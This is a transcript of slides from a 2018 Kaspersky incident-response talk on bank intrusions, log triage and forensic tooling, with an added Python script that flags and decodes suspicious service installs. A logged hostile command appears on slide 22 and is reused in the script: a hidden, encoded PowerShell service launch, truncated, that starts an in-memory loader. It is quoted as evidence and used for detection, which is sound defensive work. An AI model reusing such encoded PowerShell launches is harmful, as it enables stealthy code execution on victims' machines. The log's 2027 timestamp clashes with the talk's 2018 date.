Sergey Golovanov - Indecent Response 2018

DC7499
February 10, 2018


Transcript

  1. Indecent response 2018
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab

  2. Challenge: find an SDC bus speed

  3. (image-only slide)

  4. Agenda
    1. Shadowpad
    2. 0x403AA91EE
    3. Scanner2
    4. Plans

  5. 1.Shadowpad

  6. Case overview:
    1. The bank's antifraud system detects the printing of a lot of elite cards over the last several hours
    2. The bank starts a network audit
    3. The bank discovers suspicious DNS requests
    4. Forensics cannot find malware on the PCs
    5. The bank asks for help…

  7. DNS requests

  8. (image-only slide)

  9. (image-only slide)

  10. “Our worldwide customers range from small businesses right up to global Fortune 500 companies.” NetSarang
    American Express
    Bank of America Corp.
    Bank of China
    BNP Paribas
    Citigroup
    Deutsche Bank
    Fortis
    General Electric
    ING Group
    Merrill Lynch
    Morgan Stanley
    Shinhan Financial Group
    Societe Generale
    UBS
    https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsarang.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru

  11. https://securelist.com/shadowpad-in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. (image-only slide)

  19. (image-only slide)

  20. How to find suspicious DNS requests?
    sort | uniq -c | sort -rn

  21. How to find suspicious PowerShell?
    sort | uniq -c | sort -rn

  22. parse_evtx.exe System.evtx | findstr /i "power" | more
    Record #2396788 2027.02.22-08:03:00 'Computer':'PC1',
    'Channel':'System', 'EventSourceName':'Service Control Manager',
    'Guid':'GUID', 'Name':'Service Control Manager',
    'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04,
    'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the
    system.), 'Qualifiers':16384, 'Keywords':8080000000000000,
    'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692,
    'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID,
    'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min
    powershell.exe -nop -w hidden -encodedcommand
    JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
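
The two steps the talk leans on here, the `sort | uniq -c | sort -rn` ranking from slides 20 and 21 and the EventID 7045 record with an `-encodedcommand` payload on slide 22, written out as a small triage script. This is an added example, not code from the talk or from KasperskyLab/ForensicsTools; it parses records in the `'Key':'value'` layout the slide shows, and the service names, hostnames and all records except the slide's own encoded string are constructed. `find_suspicious_service_installs`, `decode_encoded_command` and `rank_image_paths` are names chosen for this example.

```python
"""Added example (not from the talk or KasperskyLab/ForensicsTools): triage
Service Control Manager records in the 'Key':'value' layout the slide shows,
surfacing EventID 7045 service installs whose ImagePath launches PowerShell
with an encoded command, and ranking ImagePaths by frequency the way
`sort | uniq -c | sort -rn` does. All sample records below are constructed."""
import base64
import binascii
import re
from collections import Counter

# The -encodedcommand value exactly as printed on slide 22.
ENCODED_FROM_SLIDE = (
    "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A"
    "FMAdAByAGUAYQBtACgA"
)

# Constructed sample records; hosts and service names are made up.
SAMPLE_RECORDS = [
    "Record #1 'Computer':'PC1', 'Channel':'System', 'EventID':7036, "
    "'ServiceName':'Spooler'",
    "Record #2 'Computer':'PC1', 'Channel':'System', 'EventID':7045, "
    "'ServiceName':'ExampleSvc', 'ImagePath':'C:\\Windows\\System32\\svchost.exe -k netsvcs'",
    "Record #3 'Computer':'PC2', 'Channel':'System', 'EventID':7045, "
    "'ServiceName':'ExampleSvc', 'ImagePath':'C:\\Windows\\System32\\svchost.exe -k netsvcs'",
    "Record #4 'Computer':'PC3', 'Channel':'System', 'EventID':7045, "
    "'ServiceName':'ExampleSvc', 'ImagePath':'C:\\Windows\\System32\\svchost.exe -k netsvcs'",
    "Record #5 'Computer':'PC1', 'Channel':'System', 'EventID':7045, "
    "'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min "
    "powershell.exe -nop -w hidden -encodedcommand " + ENCODED_FROM_SLIDE + "'",
]

EVENT_ID_RE = re.compile(r"'EventID':(\d+)")
# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the common ones.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)


def field(record, name):
    """Return the single-quoted value of 'name' in a record, or None."""
    m = re.search(r"'%s':'([^']*)'" % re.escape(name), record)
    return m.group(1) if m else None


def event_id(record):
    """Return the numeric EventID of a record, or None if absent."""
    m = EVENT_ID_RE.search(record)
    return int(m.group(1)) if m else None


def decode_encoded_command(command_line):
    """Decode the -EncodedCommand argument (base64 of UTF-16LE) if present."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate padding stripped by a log exporter
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def find_suspicious_service_installs(records):
    """EventID 7045 records whose ImagePath launches PowerShell, with the
    encoded command decoded where one is present."""
    hits = []
    for rec in records:
        if event_id(rec) != 7045:
            continue
        image = field(rec, "ImagePath") or ""
        if "powershell" not in image.lower():
            continue
        hits.append({
            "computer": field(rec, "Computer"),
            "service": field(rec, "ServiceName"),
            "image_path": image,
            "decoded": decode_encoded_command(image),
        })
    return hits


def rank_image_paths(records):
    """Count ImagePaths of 7045 records, most common first: the
    `sort | uniq -c | sort -rn` step. Rare paths end up at the bottom."""
    paths = (field(r, "ImagePath") for r in records if event_id(r) == 7045)
    return Counter(p for p in paths if p is not None).most_common()


if __name__ == "__main__":
    for count, path in rank_image_paths(SAMPLE_RECORDS):
        print("%7d %s" % (count, path))
    for hit in find_suspicious_service_installs(SAMPLE_RECORDS):
        print("\n%s service %r -> %s" % (hit["computer"], hit["service"], hit["decoded"]))
```

Run it on the output of `parse_evtx.exe System.evtx` one record per line and the slide's record decodes to the start of a `New-Object IO.MemoryStream(` construction; the ranking function is what you apply fleet-wide so that one-off ImagePaths stand out from the hundreds of identical svchost entries.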

  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview:
    1. No money
    2. No logs
    3. No team
    4. No idea about network
    5. CISO!

  26. What to do?
    we need logs
    we need MFTs
    we need registry hives

  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicious?
    sort | uniq -c | sort -rn

  30. https://cdn.securelist.com/files/2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is hell. Sleuthkit is not enough; we need more data about deleted files.
    2. USN Journal parsing is required without touching the HDD.
    3. Registry analysis is needed, including the unallocated part.

  33. Agenda
    1. Shadowpad
    2. 0x403AA91EE
    3. Scanner2
    4. Plans

  34. Why?

  35. (image-only slide)

  36. Thank you!
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab
